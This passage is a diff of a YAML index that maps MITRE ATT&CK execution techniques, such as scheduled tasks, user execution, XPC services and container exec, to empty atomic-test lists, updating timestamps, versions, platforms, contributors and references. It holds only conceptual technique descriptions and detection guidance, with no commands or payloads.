-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -25051,20 +25370,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -25092,7 +25410,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -25112,33 +25430,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25155,6 +25453,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -25165,9 +25464,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -25175,8 +25478,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -25216,7 +25535,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -25241,12 +25560,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25326,11 +25643,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25390,12 +25706,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25493,9 +25808,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25512,19 +25827,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25533,7 +25847,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25570,11 +25884,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25611,11 +25924,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25634,13 +25946,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25719,12 +26030,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25735,6 +26045,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25745,16 +26056,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25785,14 +26096,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25858,39 +26166,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25899,6 +26181,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25911,19 +26194,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25966,7 +26272,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25982,72 +26288,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -26055,7 +26364,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26070,7 +26383,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -26097,6 +26410,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26107,15 +26424,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -26132,7 +26453,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
